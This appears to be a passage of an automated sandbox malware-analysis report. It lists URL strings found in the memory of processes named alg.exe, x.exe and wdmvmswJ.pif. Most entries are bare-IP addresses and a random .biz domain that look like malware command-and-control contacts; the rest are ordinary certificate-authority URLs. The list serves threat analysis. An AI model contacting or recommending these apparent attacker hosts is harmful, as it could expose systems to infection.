Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/bulntsganndw5e
Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/cqrtypmijgihv
Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/cqrtypmijgihvRiU4
Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/dgltjhlriyylmg
Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/gmkfkxvhjjwggemmie
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/m
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248:80/nhxpdndgorrZ
Source: alg.exe, 00000010.00000003.2750711951.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/
Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/exygmnocmwksymmie
Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/vuf
Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/vufngsqi
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/H
Source: alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/U6
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/bh
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/bh.T
Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/mr
Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/mrttingsoih4
Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/xllckl
Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/xllcklc8e8c945i64(
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245:80/bhg
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245:80/hckdbdnsiwdW
Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.254.94.185/byhbnbikqcomemw
Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.254.94.185/byhbnbikqcomemwsqi
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/lio4
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/p
Source: alg.exe, 00000010.00000003.2093566744.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/tpndpotkaatb
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/rbpibulhoasascdr
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wnele
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wneleRiU4
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wnelecid4
Source: alg.exe, 00000010.00000003.2453121130.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/xsnbcmvbhjayqro
Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/I6
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/ekxop
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhm
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhmRiU4
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhmsqi
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxop
Source: alg.exe, 00000010.00000003.2079470414.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxopatb
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxopngs
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200:80/vekxop
Source: alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1p
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1q6
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1s
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/55
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/e6
Source: alg.exe, 00000010.00000003.1644399119.0000000000576000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/rwebgnmbtiq
Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/w
Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wV
Source: alg.exe, 00000010.00000003.2054624676.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wstlgiiatb
Source: alg.exe, 00000010.00000003.2054624676.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wstlgu6
Source: alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/rwebgnmbtiq&
Source: alg.exe, 00000010.00000003.1637081830.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/w0
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/wstlg
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/wfcpepuolxclud
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/xwfedwcvhvxkiha
Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/E6
Source: alg.exe, 00000010.00000003.2527920432.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/fwiohktfcqxxnbh
Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/gs
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/m
Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ohrgkx
Source: alg.exe, 00000010.00000003.2066991172.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ohrgkxatb
Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/s
Source: alg.exe, 00000010.00000003.1634866335.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/uqcynitxoaix
Source: alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/ohrgkx
Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/uqcynitxoaix
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/55
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/95Z4
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/T
Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/f
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/p
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/pe6
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/pu6
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/s
Source: alg.exe, 00000010.00000003.1918263435.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1917843582.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/vdvikkmvoibst
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/f0
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/p
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bumxkqgxu.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
